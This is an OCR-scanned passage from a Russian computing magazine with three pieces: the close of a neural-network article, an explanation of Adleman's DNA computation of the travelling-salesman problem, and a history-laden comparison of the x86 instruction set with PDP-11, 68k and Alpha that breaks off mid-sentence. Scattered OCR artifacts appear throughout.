УЖЕ СУЩЕСТВУЮТ РЕАЛИЗАЦИИ JPEG- 
ЭНКОДЕРА, ОСНОВАННЫЕ НА НЕЙРОН- 
НЫХ ПРОЦЕССОРАХ. 


> = завтра. Шумиха вокруг нейронных сетей и ней- 
рокомпьютеров давно улеглась. Дело Минского жи- 
вет, и потенциальные возможности НС досконально 
изучены, а круг задач, доступных нейросистемам, 
четко очерчен линией строгих доказательств. Ждать 
невиданных успехов в деле реализации искусствен- 
ного интеллекта или чего-то подобного от НС пока 
не приходится. Разве что где-то появится еще один 
Хопфилд и создаст принципиально новую систему 
построения или обучения нейросетей. Другими сло- 
вами, нейронные сети сегодня уже не вызывают бы- 
лого ажиотажа и не рождают в сердцах ученых нес- 
быточных надежд. А вот надежд «сбыточных» — 
сколько угодно. Несколько возможностей примене- 


ния НС в сегодняшней технике мы с тобой уже pac 
смотрели, но за кадром (или за страницей) осталос 
огромное количество разработок, так или инач 
опирающихся на нейросетевой базис. Природны 
параллелизм НС делает их очень удобным инстр} 
ментом для всевозможных вычислительных экспе 
риментов, требующих одновременной обработк 
данных. Опуская «тривиальные» задачи, такие ка 
прогноз погоды или курса валют, можно отметит 
интереснейшие отечественные исследования в OC 
ласти НС применительно к модулярной арифмети- 
ке. Направление, которое в будущем, возможно, 
позволит создать принципиально новый вид процес- 
сора, основанный на непозиционной системе счис- 
ления. Не буду забивать тебе голову математикой, 
давай просто вместе порадуемся за наших ученых. 
Интересующихся отсылаю к работам И. Я. Акушско- 
ro, Д. И. Юдицкого и Н. И. Червякова. 

>» = заключение. Как ты понимаешь, нейросисте- 
мы вовсе не собираются уходить в отставку. В сов- 
ременной науке и технологии четко прослеживает- 
ся тенденция к слиянию разнородных наук. Проб- 
лемы микробиологии решаются методами кванто- 
вой физики, программисты занимаются синтезом 
ДНК (читай статью о ДНК-компьютерах в этом но- 
мере), а сложные математические теоремы, оказы- 
вается, прекрасно вписываются в нотный стан. 
То же происходит и с П. Зная лишь пару языков, 
уже невозможно называть себя программистом. 
Эрик Реймонд советует всем желающим стать мас- 
терами кодинга учить Lisp: «Даже если вы никогда 
не напишете на Лиспе ни строчки, само его изуче- 
ние сделает вас просветленным человеком и от- 
личным программистом». Сокращение НС очень 
часто можно встретить рядом с другими двумя бук- 
вами — ИИ. Что неудивительно, ведь принцип са- 
моорганизующейся нейронной сети, которая уди- 
вительно напоминает ту, что заложена в нашей го- 
лове, прямиком выводит на идею создания на ее 
основе искусственного интеллекта. Я не верю в ис- 
кусственный интеллект на основе НС (в их нынеш- 
нем виде). Но не сетями едиными живем ведь: 
существуют генетические алгоритмы, нечеткая ло- 
гика и еще много других интересных технологий, 
каждая из которых активно развивается. Так что 
в искусственный интеллект я все-таки верю. Дру- 
гое дело, что открытие это будет находиться 
на стыке десятка разных наук и сотни техноло- 
гий — от теории музыки до алгебры групп, и я ду- 
маю, что нейронные сети в этом списке будут зани- 
мать не последнее место © 


www.neuroproject.ru 
масса полезной информации по HC и не только 


neuroschool.narod.ru 
статьи, книги, ссылки — есть все. Рекомендую 


www.statsoft.ru/nome/textbook/modules/stneunet.html 
введение в практическое применение НС 


www.orc.ru/~stasson/neurox.html 

тут можно скачать пакет NeuroOffice и кучу примеров к нему 
www.module.ru 

НТЦ «Модуль», хорошая документация по процессорам серии 
NeuroMatrix + эмулятор 


MC4 
нейроплата 
от НТЦ «Модуль» 


LAI о dule 


NM6403 
нейропроцессор 
от НТЦ «Модуль» 
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как заставить 
днк работать 


АРТУР КЛАРК КАК-ТО СКАЗАЛ: «ЛЮБАЯ ДОСТАТОЧНО 
РАЗВИТАЯ ТЕХНОЛОГИЯ НЕОТЛИЧИМА ОТ МАГИИ». 
КОНЕЧНО, ТЕЛЕВИДЕНИЕ И АВТОМАТ КАЛАШНИКОВА 
ВПОЛНЕ СПОСОБНЫ ВСЕЛИТЬ СУЕВЕРНЫЙ УЖАС В 
СЕРДЦА, СКАЖЕМ, АБОРИГЕНОВ АВСТРАЛИИ, НУ ДА 
И ТО, МАЛОВЕРОЯТНО. МЫ ЖЕ БУДЕМ ГОВОРИТЬ 0 
ТЕХНОЛОГИИ, КОТОРАЯ ПОКАЖЕТСЯ ВОЛШЕБСТВОМ 
ДАЖЕ ДЛЯ ПРОДВИНУТЫХ КОМПЬЮТЕРЩИКОВ — 

0 ТЕХНОЛОГИИ ДНК-ВЫЧИСЛЕНИЙ 

Шестой 

6th@mail.ru 


> магия IT. Старик зябко поежился, открыл 
один глаз и заговорил: «Существует три ступени 
посвящения в тайны вычислительных машин». 
Открыв второй глаз, он оглядел притихшую ауди- 
торию и продолжал: «Адепты первой ступени пре- 
бывают в неведении относительно истинной при- 
роды сущего, ибо уверены, что кроме привычной 
им архитектуры IBM РС, ничто более не существу- 
ет в мире. Только инициация во вторую ступень 
способна исцелить в человеке слепоту ума его, и, 
прозрев, внимает он дивной симфонии имен: 
PowerMac, SUN Spark, DEC Alpha... Но истинный 
свет ниспадет лишь на тех, кто познает тайну 
третьей ступени». Учитель повысил голос и воздел 
руки: «О, наивные, решающие задачу коммивоя- 
жера методом полного перебора! Внемлите сло- 
вам моим, ибо я буду говорить о квантовых, анало- 
говых, химических и пептидных компьютерах!». 
Так говорил мой препод по нетрадиционным архи- 


днк 

строение: 

две цепочки (респект Уотсону и Крику 

за открытие), состоящие из нуклеотидов, 
соединенных по принципу 
комплементарности. 


тектурам :). Шучу, конечно, но факт неоспорим — 
при словах «не РС» все почему-то вспоминают 
Мак, особо продвинутые говорят о нейронных/век- 
торных процессорах. Но редко кто оказывается в 
курсе, что кроме привычных архитектур существу- 
ют разработки, переворачивающие все наши 
представления о компьютерах и заодно фон Ней- 
мана в гробу. Каждое из этих направлений — де- 
ло, которому не жалко посвятить и жизнь, что уж 
говорить о статье в журнале. Но и жизнь, и статья 
имеют свои пределы и границы, поэтому не будем 
растекаться мыслью по древу, а начнем разби- 
раться в одном из удивительнейших П-проектов 
нашего времени — ДНК-компьютерах. 

> коммивояжер и ДНК. Tak называемая задача 
коммивояжера заключается в нахождении опти- 
мального маршрута, проходящего через заданные 
города так, что каждый город оказывается посе- 
щенным единожды. Существует масса вариантов 
решения этой задачи. Одни просты как «Hello 
World» на Бейсике, другие по части сложности мо- 
гут поспорить с дизассемблированием в уме, ска- 
жем, Старкрафта. 

Но Леонард Эдлман, который, кстати, в свое 
время участвовал в разработке знаменитого алго- 
ритма шифрования RSA, не искал ни легких, 
ни сложных путей, а пошел своей, особой дорогой, 
и в далеком 1994 году представил на суд общест- 
венности решение задачи коммивояжера, основан- 
ное на свойствах дезоксирибонуклеиновой кисло- 
ты — ДНК. Алгоритм предложенного им метода 
был таков: 


1 СГЕНЕРИРОВАТЬ ВСЕ ВОЗМОЖНЫЕ 
МАРШРУТЫ. 


2 ВЫБРАТЬ ТЕ ИЗ НИХ, КОТОРЫЕ 
НАЧИНАЮТСЯ И ЗАКАНЧИВАЮТСЯ 
В НУЖНЫХ ГОРОДАХ. 


3 ВЫБРАТЬ ИЗ ОСТАВШИХСЯ ТЕ, 
КОТОРЫЕ ВКЛЮЧАЮТ НУЖНОЕ 
ЧИСЛО ГОРОДОВ. 


4 ВЫБРАТЬ ТЕ ИЗ НИХ, В КОТОРЫХ 
КАЖДЫЙ ГОРОД ВСТРЕЧАЕТСЯ 
ТОЛЬКО ОДИН РАЗ. 


«Да это же полный перебор!», — скажешь ты. И бу- 
дешь прав. С алгоритмической точки зрения метод 
Эдлмана совершенно непримечателен. Но давай 
разберемся, КАК выполнялись вычисления в ходе 
этого эксперимента. 
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> шаг 1. ДНК состоит из гуанина, аденина, тими- 
на и цитозина. Знать, что это такое, вовсе не обяза- 
тельно, для нас представляет интерес то, что эти 
элементы располагаются в цепи ДНК в определен- 
ном порядке, который и кодирует генную информа- 
цию. Для удобства названия элементов сокращают 
до первых букв — С, А, Т и С, которые и представля- 
ют базис системы счисления ДНК-компьютера. Та- 
ким образом, первый пункт алгоритма Эдлмана вы- 
полняется очень просто — достаточно закодировать 
названия городов в последовательности вида 
СТСАТАС, а потом сформировать все возможные 
маршруты, соединив каждую ДНК с каждой другой. 
Обычная комбинаторика и никакого мошенства :). 
Возможно, у тебя возник вопрос: ну хорошо, закоди- 
ровали мы Ставрополь в цепочку GTCA, но где взять 
ДНК именно с такой структурой? Можно, конечно, 
перебрать гены десятка миллионов людей, найти 
нужную и «вырезать» :). Но обычно поступают про- 
ще. Современная молекулярная биология распола- 
гает ДНК-синтезатором — аппаратом, который поз- 
воляет создавать любые цепочки ДНК с минимумом 
затрат. Как видно, с этого момента привычная тех- 
нология окончательно уступает место магии. 

>  шаг2. Все возможные варианты сгенерирова- 
ны, теперь нужно найти те из них, что начинаются 
и заканчиваются в нужных нам городах. Для этого 
используется полимеразная цепная реакция, в про- 
цессе которой фрагменты ДНК, содержащие задан- 
ный элемент (в нашем случае — город), соединяют- 
ся с фрагментами, содержащими другой заданный 
элемент. Повторяя реакцию, мы получим множест- 
во ДНК, каждая из которых начинается с кода города 
отправления, и заканчивается кодом города прибытия. 
> шаг 3. Все полученные ДНК действительно 
соединяют заданные пункты, но число элементов в 
каждой цепочке является различным, нам же нуж- 
ны маршруты, включающие строго определенное 
количество городов. Иначе говоря, нам нужен ка- 
кой-то фильтр, пропускающий ДНК определенной 
длины, и отсеивающий все остальные. Этакий IF 
на молекулярном уровне. Цепочка ДНК имеет отри- 
цательный заряд, значит, если поместить такую це- 
почку в электрическое поле, она будет двигаться по 
направлению к «плюсу». Теперь представь миниа- 
тюрный лабиринт с множеством узких ходов, распо- 
ложенный на пути движения цепочек. Чтобы доб- 
раться до вожделенного плюса, влекомая зарядом 
ДНК должна протиснуться сквозь эти отверстия. Ес- 
тественно, чем меньше длина цепочки, тем меньше 
времени у нее займет прохождение лабиринта, 
и короткие цепочки найдут свой путь к плюсу быст- 
рее, чем длинные. Замерив скорости их движения, 
мы можем отсечь слишком быстрые и слишком 
медленные ДНК и оставить лишь Te, длина которых 
удовлетворяет поставленному условию. Такая тех- 
ника широко распространена в молекулярной био- 
логии и носит название гелевого электрофореза. 
> war 4. И, наконец, последняя сложность — 
нам нужно выбрать те маршруты, которые включа- 
юткаждый город по одному, и только по одному ра- 


зу. Это, наверное, самый сложный в реализации, но 
самый простой для понимания пункт. Используе- 
мый прием, называемый affinity purification (будем 
называть его просто АП) очень напоминает принцип 
действия игрушечной рыбалки, в которую я, напри- 
мер, с удовольствием поиграл бы и сейчас :). Пом- 
нишь? Маленький прудик с пластмассовыми рыбка- 
ми, железные носы или что-то вроде и удочка с маг- 
нитиком на конце. АП выглядит практически также. 
Мы берем магнит (соответствующего размера, ес- 
тественно) и прикрепляем к нему фрагмент ДНК, 
соответствующий первому из нужных городов. Бла- 
годаря некоторым замечательным свойствам де- 
зоксирибонуклеиновой кислоты, на нашу «удочку» 
поймаются все цепочки, содержащие город-при- 
манку. Потом мы выловим все ДНК, включающие 
второй город, потом третий и так далее. В результа- 
те получим цепочки, в которых код каждого пункта 
встречается ровно один раз. То есть именно то, что 
и требовалось. 

> — итого. Итак, мы воспользовались синтезато- 
ром, чтобы создать цепочки ДНК, кодирующие все 
возможные маршруты, затем с помощью полиме- 
разной цепной реакции выбрали начинающиеся 
и оканчивающиеся в нужных городах, применили 
гелевый электрофорез, чтобы отсеять цепочки не- 
соответствующей длины, и, наконец, вооружив- 
шись АП, выловили все ДНК, включающие каждый 
город лишь по одному разу. Осталось декодировать 
получившиеся цепочки, и решение готово. 

> перспективы. Вдумчивый читатель (как при- 
нято писать в таких случаях :)) наверняка заметит, 
что решение Эдлмана грешит тем же, чем плохи 
все переборные методы — при увеличении числа 
входов трудоемкость алгоритма возрастает экспо- 
ненциально, и задача с достаточно большим коли- 
чеством городов может оказаться практически не- 
разрешимой. После появления первой статьи, пос- 
вященной ДНК-вычислениям, дотошные скептики 
посчитали, что для решения задачи коммивояжера 
с двумя сотнями городов потребуется количество 
ДНК, весящее больше, чем вся наша планета. Но на 
деле не все так плохо, первоначальный метод Эдл- 
мана, конечно, чрезвычайно трудоемок, но иссле- 
дования в области ДНК-вычислений идут полным 
ходом, уже существуют разработки, способные по- 
низить сложность ДНК-алгоритмов в разы, и можно 


с уверенностью сказать, что в ближайшем будущем 
мы увидим еще более интересные решения. 
Для справки: в одном кубическом сантиметре мо- 
жет поместиться около десяти триллионов ДНК, 
способных хранить 10 терабайт данных. 

Еще одна проблема ДНК-вычислений заклю- 
чается в том, что все используемые технологии — 
синтез ДНК, ПЦР, гелевый электрофорез, АП — 
не гарантируют 100% соответствия ожиданиям. Ра- 
ботая в столь тонкой области, какой является моле- 
кулярная биология, этого следовало бы ожидать. 
Да, ошибка, даже если и произойдет, будет чрезвы- 
чайно мала, но представь, что переменная цикла в 
твоей программе, скажем, может неожиданно 
уменьшиться или увеличиться на жалкую единич- 
ку — последствия могут быть катастрофическими. 
Но и здесь технология не стоит на месте: вводятся 
новые методы коррекции ошибок, совершенствуют- 
ся сами методики. 

Будущее ДНК-компьютеров пока еще смутно 
различимо в тьме грядущих дней. Возможно, на- 
дежды энтузиастов не оправдаются, и такие маши- 
ны станут лишь игрушкой десятка чудаков, не же- 
лающих отдавать свое детище на растерзание жес- 
токому миру. Возможно, нас ждет невиданный до- 
селе прорыв в области IT, и сложнейшие задачи, се- 
годня требующие вычислительной мощности десят- 
ка суперкомпьютеров, завтра будут возложены на 
плечи ДНК-компьютеров, размером с банку пива. 
Возможно все. Но одно можно сказать точно. Тех- 
нология ДНК-вычислений — это открытие. Впервые 
в поисках решения своих низменных и мирских за- 
дач, какой является, например, задача коммивоя- 
жера, человек забрался так далеко в запретную об- 
ласть. Чем все это кончится? Увидим © 


http://en.wikipedia.org/wiki/DNA_computing 
просто чтобы въехать в тему + хорошие ссылки в конце 


http://users.aol.com/ibrandt/dna_computer.html 
на этой страничке Йен Брандт собрал целую 
кучу ссылок на всевозможные ресурсы 

о ДНК-компьютерах 


http://users.aol.com/ibrandt/discover_article.html 
забавный комикс, объясняющий основные 
принципы ДНК-вычислений 


http://www.dnaancestryproject.com 

не совсем по теме, но не упомянуть не мог. 

За 119 баксов здесь проанализируют твою генную 
информацию и выведут твое генеалогическое древо. 
Вдруг ты потомок Чингизхана? 


днк 
НА СЛУЖБЕ ДНК 


ДНК-компьютеры, благодаря своей уни- 
кальной структуре, могут помочь и в де- 
ле расшифровки пока еще неизученных 
фрагментов ДНК живых организмов. 
Первым в мире ДНК-компьютером, раз- 
работанным специально для этой зада- 
чи, является Olympus, созданный япон- 


ской компанией Olympus Optical в 2002 
году. Эхуд Шапиро, один из ведущих 
экспертов по ДНК-компьютерам во всем 
мире, считает, что «несмотря на то, что 
сегодня наши машины могут работать 
лишь с искусственно синтезированными 
ДНК, недалек тот день, когда в качестве 
основы мы сможем использовать лю- 
бые ДНК». Уже сейчас существуют мо- 
дели, в которых все функции обработки 
данных, а также ввод и вывод информа- 
ции выполняются исключительно по- 
средством молекул ДНК. 


84 СПЕЦ-ТОР!С СПЕЦ 01-07 


война 
миров 


КАЖДЫЙ КУЛИК СВОЕ БОЛОТО ХВАЛИТ. 

КРОМЕ АРХИТЕКТУРЫ Х86 НА СВЕТЕ ЕСТЬ 
КОМПЬЮТЕРЫ ПОСТРОЕННЫЕ И НА ДРУГИХ 
ИДЕОЛОГИЯХ.ОНИ НЕТАК ШИРОКО РАСПРОСТРАНЕНЫ, 
НО ЗНАТЬ 0 НИХ ВСЕ РАВНО НУЖНО! 

Крис Касперски 


> «священные» войны по поводу «x86 процес- 
соры — дерьмо, ххх процессоры — rules» неприят- 
ны в первую очередь тем, что они унижают и дис- 
квалифицируют х86-программистов в глазах всей 
остальной программистской общественности. 
Причем, подавляющее большинство защитни- 
ков х86 рхитектуры с представителями других про- 
цессорных семейств знакомы в лучшем случае по- 
наслышке, а ее противники (львиную долю которых 
составляют поклонники рар-11) склонны ухваты- 
ваться за отдельные, непринципиальные архитек- 
турные особенности, которые в х86 реализованы 
несколько иначе, чем в их любимом процессоре. В 
общем, аргументы обоих сторон носят глубоко 
необъективный и бездоказательный характер, сво- 
дящийся в основном к ругани и наездам в стиле: 
«мне пришлось как-то переносить форт с рар-11 на 
18086, причем последний я видел впервые... так от 
архитектуры i80x86 до сих пор тошнит (особенно по 
сравнению с рар-11)» и «господи, до чего трудно бы- 
ло преодолеть рвотный барьер, осваивая после 5 
лет работы на рар-11 это интелевое смоляное чучел- 
ко :(. Кто работал на рар-11, думаю, подтвердит». 
Мыщьъьх’ем была предпринята попытка если 
не поставить точку в этом вопросе, то, по крайней 
мере, дать спорящим сторонам свежую пищу для 
размышлений (как знать, быть может после этого 
в конференциях вместо реплик «сам дурак» нако- 
нец-то зазвучат нормальные технические аргумен- 
ты). Сразу оговорим, что ниже будут сравниваться 
исключительно программные модели нескольких 
наиболее ярких релизов процессоров. В первую 
очередь, это, конечно, рар-11 — легендарнейших 
процессор всех времен и народов, породивший 
огромное количество клонов (и отечественные 
кальки к1801 в частности), многие из которых ис- 
правно работают и поныне. Затем серию процессо- 
ров 68k от motorola, известную в первую очередь 
по Эплам ранних моделей и едва не ставшую ос- 
новной для ibm pc. Наконец, для полноты картины, 
мы рассмотрим процессоры семейства dec alpha. 
Мне могут возразить, что сравнивать альфу со все- 
ми выше перечисленными процессорами не сов- 
сем корректно, поскольку он совсем из другой ка- 
тегории. Именно так! Но это лишь усиливает кон- 
траст! (Кроме того, альфа окутан таким количе- 
ством мифов, домыслов и легенд, что близкое зна- 
комство с ним никому не помешает). 
Сравнительный анализ охватывает как клю- 
чевые архитектурные концепции, так и индивиду- 
альные непринципиальные архитектурные особен- 
ности, такие как, например, наличие в рар-11 ко- 
манды обнуления, отсутствующей в х86 и вынуж- 
дающей программистов использовать либо пере- 
сылку непосредственного нуля, либо логическую 
операцию «или исключающее и», что, с одной сто- 
роны, ничуть не ухудшает технические характери- 
стики программы, но с другой — создает впечатле- 
ния убогости конструкции. 
> отличительной особенностью x86 является 
чрезвычайно богатый набор машинных команд, ко- 


личество которых в старших моделях РепНит'ов 
достигает пятисот, что значительно превышает ко- 
личество команд во всех остальных популярных 
процессорах вместе взятых! Разумеется, само по 
себе число поддерживаемых машинных команд 
еще ни о чем не говорит, напротив, даже вызывает 
некоторые сомнения в их элегантности. Вспомина- 
ется анекдот десятилетней давности: встречаются 
как-то представители двух функционально одина- 
ковых заводов, один из которых расположен 
в СССР, а другой в Японии. Вот японский предста- 
витель и говорит: «На моем заводе работают во- 
семь человек». А русскому стыдно сказать, что у не- 
го работает целая тысяча, и он, слегка приукраши- 
вая действительность, скашивает количество рабо- 
тающих до девяти. На следующий день заметно 
нервничающий японец спрашивает нашего: «Слу- 
шай, я всю ночь не спал, но так и не смог понять: что 
же у тебя девятый рабочий делает-то?». 

Действительно, чтобы полноценно програм- 
мировать на ассемблере х86, нужно очень много- 
му научиться, и лишь немногим программистам 
удается удержать весь этот набор команд у себя 
в голове. Постоянными спутниками становятся ты- 
сячи страниц технической документации, и вместо 
того, чтобы сосредоточиться непосредственно на 
решаемой задаче, программист вынужден снова и 
снова штудировать многочисленные руководства, 
пытаясь разобраться, в какую же форму следует 
облечь свою программистскую мысль, чтобы до- 
нести ее до «тупой» машины. Ассемблерные прог- 
раммисты уже улыбнулись? И правильно! Ведь 
большая часть этих пятисот команд относится 
к векторной и мультимедийной обработке, то есть 
к прямо таки скажем весьма специфичным облас- 
тям. Избыточность — она, конечно, карман не тя- 
нет (во всяком случае, карман программиста, про 
производителей процессоров мы намеренно не го- 
ворим), но вот многословность, обособленность и 
косность системы команд уродуют листинги толь- 
ко так! Вот только несколько примеров. Отсут- 
ствие адресации — память не позволяет обраба- 
тывать переменные, находящиеся в ней, без пере- 
сылки их содержимого во временный регистр (и 
это при том, что количество регистров общего наз- 
начения в х86 процессорах крайне невелико). Ко- 
манды х86 сопроцессора используют свои — при- 
чем крайне примитивные — способы адресации, 
а потому и синтаксически, и архитектурно обосаб- 
ливаются от целочисленных команд, что сущест- 
венно затрудняет как их изучение, так и работу 
с ними. Ряд машинных команд жестко связан со 
строго определенными регистрами, и за счет это- 
го произвола многие из них практически пол- 
ностью обессмысливаются (в частности, привязка 
счетчика цикла к регистру ЕСХ/СХ не позволяет 
реализовывать вложенные циклы). Наконец, раз- 
дельная адресация оперативной памяти и портов 
ввода/вывода... 

Процессоры семейства РОР-11 и 68К обхо- 
дятся значительно меньшим количеством команд, 


причем удобство их ассемблера было столь вели- 
ко, что позволяло ему на равных конкурировать 
с Си и другими языками высокого уровня. Теперь, 
конечно, программистские веяния изменились, 
и ассемблер неожиданно выпал из их внимания, 
но недостатки системы команд х86 процессоров 
тут совершенно ни при чем (хотя, некоторые 
и не разделяют такой точки зрения). 

Ограниченный объем журнальной статьи 
не позволяет мыщьху рассказать о достоинствах и 
недостатках каждого из процессоров во всех под- 
робностях, но это, собственно, и не нужно. Зачем 
жевать уже жеванное (мыщьъх'и к жвачным живот- 
ным не относятся!), когда табличный материал 
грызть намного удобнее! Перелопатив кучу стра- 
ниц документации, мыщъх отделил зерна от пле- 
вел и складировал их посреди своей норы, получив 
в итоге очень внушительную (но легкоусвояемую) 
таблицу 1, готовую к непосредственному употреб- 
лению (желательно с пивом). 

А после употребления пива посмотрим 
на примеры всем известной программы «Hello 
world» на разных ассемблерах: 
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«Hello world» Ha 68К ассемблере 


На этом наше историческое повествование про ac- 
семблеры подходят к концу, а мы вспомним еще па- 
у исторических моментов из жизни компьютеров 
> — из глубины веков. «THE IRONY IS THAT THE 
ORIGINAL INSTRUCTION SET WAS THEIRS, AND THE 
ORIGINAL MOTIVATION WAS THEIRS». MAZOR SAID. «ПО 
ИРОНИИ СУДЬБЫ, ЭТОТ ОСНОВОПОЛАГАЮЩИЙ НАБОР 
ИНСТРУКЦИЙ БЫЛ НЕ НАШ, КАК И ИСХОДНАЯ ПОСТА- 
НОВКА ЗАДАЧИ». СТЕНЛИ МАЗОР. 

Pyraa Intel за уродливый (с их точки зрения!) 
набор инструкций, ее противники зачастую даже и 
не подозревают, что роль компании Intel в станов- 
лении х86 набора инструкций более чем скромна. 
Собственно, «зачастую» еще слабо сказано. Нав- 
ряд ли хоть один из спорщиков об этом вообще 
знает! Но все по порядку... 

...Давным-давно, когда славные шестидеся- 
тые уже подходили к концу, а кремниевая револю- 
ция семидесятых еще и не думала начинаться, мо- 
лодая и еще совсем не окрепшая компания 
Intel неожиданно для себя получила заказ от круп- 
ной (по тем временам) японской компании Busi- 
com, поручившей парням из Intel разработку две- 
надцати микросхем для своих калькуляторов, ко- 
торыми Busicom тогда занималась. He то чтобы 
этот заказ воодушевил руководство Intel, которое 
прекрасно осознавало, что осуществить такой 
проект своими силами ей просто нереально, но 
в бизнесе главное «застолбить» за собой заказ, 
а там... Авось что-нибудь да придумаем! Соб- 
ственно, так и произошло: ведущий сотрудник 
Intel примерно в это же самое время обнаружил, 
что новая метало-оксидно-кремниевая технология 
дает возможность разместить все компоненты 
центрального процессора на одной-единственной 
микросхеме. Сейчас это кажется очевидным, 


mel 


но тогда... Intel просто He поняла, что она изобре- 
ла, и, проявив чудовищную недальновидность, 
«слила» эту технологию окончательно замучив- 
шей ее Busicom, которая к тому времени уже, ве- 
роятно, и не надеялась получить свои микросхе- 
мы. В общем, вместо двенадцати заказанных мик- 
росхем Intel предложила сделать всего одну су- 
пер-микросхему, реализующую функции всех их. 
Такой поворот событий не очень-то обрадовал 
японцев (точнее — совсем не обрадовал). По на- 
чалу они даже едва не отказались, но, хорошень- 
ко подумав, решили, что лучше синица в руке, и 
приняли работу. 

Приблизительно в это же самое время до ру- 
ководства Intel доходит, что было у них в руках 
и что они упустили. Все, что остается... «Лететь 
в Японию и вести с Busicom переговоры», выку- 
пая у ошарашенных японцев только что продан- 
ный им чип... Впрочем, вернемся к непосред- 
ственному предмету нашего разговора — разра- 
ботке системы команд для вновь созданного мик- 
ропроцессора. 

Система команд первого в мире микропро- 
цессора, по-видимому, разрабатывалась двумя 
людьми, — собственно самим Тедом Хофом и при- 
соединившимися к нему впоследствии Стенлом 
Мэйзором. Другие же источники утверждают, что 
она была естественным путем содрана с процессо- 
ров IBM и Digital. Что ж! Дотошным читателям еще 
во многом предстоит разобраться, мне же искать 
описание чипа Intel 4004 и скрупулезно сравнивать 
его с продукцией остальных компаний просто лень. 
Как бы там ни было, система команд Intel 4004 
не имела будущего и в скором времени умерла: 
www.cs.cuw.edu/csc/csc425/4004card.html. 

История x86 начала свой отсчет несколько позд- 
нее. Немногое подробности уцелели стой поры, — вот 
практически все, что мне удалось раскопать. 

В том же 1969 году Intel получила заказ OT Te- 
хасской компании Computer Terminal Corporati- 
on (в последствии переименованной в Data-Point) Ha 
интегрирование разработанного ею процессора 
в кристалл кремния. Обратите внимание, — имен- 
но интегрирование, а отнюдь не самостоятельную 
разработку, как это было в случае с usicom. Други- 
ми словами, от Intel требовалось создать микропро- 
цессор в полном соответствии со всеми предостав- 
ленными спецификациями, в которые, естественно, 
входило и полное описание набора машинных ко- 
манд для терминала. 

Используемая Data-Point система команд бы- 
ла... нет, не плохой, скорее, ее можно назвать при- 
митивной, но для терминалов — вполне достаточ- 
ной. Действительно, терминалы (даже интеллекту- 
альные!) не особо-то притязательны, и излишняя 
элегантность и архитектурные изыски им абсолют- 
но ни к чему. Сегодня, когда миллиарды транзисто- 
ров стоят дешевле качественных компьютерных 
корпусов (а не этих дребезжащих китайских жестя- 
нок), трудно поверить, что еще совсем недавно 
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за каждый транзистор приходилось платить, и же- 
лезо с избыточной функциональностью просто 
не окупалось. Счетные задачи решал центральный 
процессор, установленный на главной машине. 
Терминал занимался лишь вводом и отображени- 
ем данных, то есть обеспечивал то, что сегодня на- 
зывается интерфейсом. Ну да, разумеется, ника- 
кой интерактивности (в сегодняшнем понимании 
этого слова) там и не ночевало, и основным сред- 
ством общения с компьютером была командная 
строка. Соответственно, набор инструкций также 
был ориентирован на управление, а не на вычисле- 
ния и математическую обработку. К тому же, пос- 
кольку программное обеспечение терминала, за- 
шитое в его ПЗУ, не меняется каждый день, на 
удобство программирования терминального про- 
цессора всем было глубоко начхать, и никакой эле- 
гантности от его системы команд попросту не тре- 
бовалось (кого из нас, сегодняшних, волнует сис- 
тема команд, ну, скажем, процессоров модема?). 
Реализация микропроцессора заняла практи- 
чески три года. Лучшие инженеры компании, увле- 
ченные своими идеями, работали практически 
на пределе человеческих возможностей, отдавая 
процессору и дни, и ночи, и выходные. «Они явля- 
лись на работу к восьми утра и работали до шести 
вечера, забывая сделать перерыв на обед. 
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Они просыпались задолго до восхода солнца, что- 
бы опробовать идею, внезапно пришедшую им 
в голову. Часто семьи разваливались». Когда же 
«младенец» наконец заработал, компания Data- 
Point переживала не лучшие времена и потому от- 
казалась выплачивать положенную по контракту 
сумму, ссылаясь на то, что микропроцессор слиш- 
ком медлителен и к тому же требует чрезмерно 
большого количества микросхем поддержки. В ка- 
честве отступного компании Intel были переданы 
все права на систему команд микропроцессора, — 
не слишком-то хорошее утешение, но все-таки луч- 
ше, чем совсем ничего. 

Такой поворот событий, признаться, сильно 
озаботил Intel, и она начала продвигать микропро- 
цессор 8008 (а именно такое обозначение он полу- 
чил) собственными силами. И это, надо сказать, ей 
удалось! Новый чип нашел широкое применение не 
только в микроконтроллерах, но и в первых персо- 
нальных компьютерах только-только начавших по- 
являться к тому времени. Кстати, одна из распро- 
страненных легенд гласит, что первым персональ- 
ным компьютером был «Альтаир», но это неправ- 
да! «Альтаир», основанный на 8080, появился нес- 
колько позднее. Его опередило больше количест- 
во микро-ЭВМ, и RGS-08 с «Марком» в частности. 
Конечно, это были очень и очень простые машины, 


основанные на 8008, который поддерживал набор 
из 45 команд и мог непосредственно адресовать аж 
16 Килобайт (не улыбайтесь, — по тем временам 
эта величина была весьма нехилой). 

Вот так, собственно, все и завертелось. Сле- 
дующий микропроцессор, представленный Intel, — 
8080 — не был, да и не мог быть подлинно револю- 
ционным. Да, разработчики добавили тридцать но- 
вых команд, увеличили непосредственно адресуе- 
мое пространство до 64 Кб, кое-что исправили по- 
мелочи, но на принципиальное улучшение архитек- 
туры они не отважились. Да и кому, собственно, 
принципиально новый процессор был нужен? 

На базе 8080 процессора было собрано боль- 
шое количество микрокомпьютеров, обросших за 
время своего существования большим количест- 
вом программного обеспечения. Операционная 
система CP/M, текстовой редактор WordStar, база 
данных dBase... Популярность этих программ бы- 
ла столь велика, что их веяния прослеживаются до 
сих пор! А потому всякая мысль об отказе обратной 
совместимости в последующих моделях процессо- 
ров представлялась руководству Intel и экономи- 
чески, и политически убийственной, но... Они все- 
таки сделали это, благодаря чему все мы сидим 
под x86, а не решись инженеры Intel в свое время 
на достаточно рискованный шаг по усовершенство- 
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ванию архитектуры своего процессора, — его бы 
уже давно вытеснила Motorola 68K или DEC Alpha. 

Новое детище — 8086, (кстати, на момент 
своего рождения заметно обогнавшее и время, 
и рынок) не обеспечивало прямой бинарной сов- 
местимости с 8080 (то есть не могло выполнять 
уже откомпилированные программы) и было сов- 
местимо лишь на уровне ассемблера (при нали- 
чии исходных текстов проблема переноса реша- 
лась простой перекомпиляцией). Система команд 
претерпела значительные изменения (не все из 
которых, впрочем, пошли ей на пользу), но вмес- 
те с дополнительными возможностями приобрела 
некоторую плебейскую разношерстность и пе- 
чально известную сегментную модель памяти. «И 
откуда только появились эти чертовы сегмен- 
ты?!», — вздыхали программисты начала восьми- 
десятых — конца девяностых. Неужто эти идиоты 
из Intel He могли придумать, как обойтись без них? 
Что x, попробую ответить. Сегменты, собственно, 
и появились потому, что 8086 опередил свое вре- 
мя, ухитряясь адресовать аж 1 Мб памяти вместо 
«положенных» ему 64 Кб. Действительно, при по- 
байтовой адресации памяти 16-битные указатели 
могут «бить» лишь в пределах одного 64 Кб бло- 
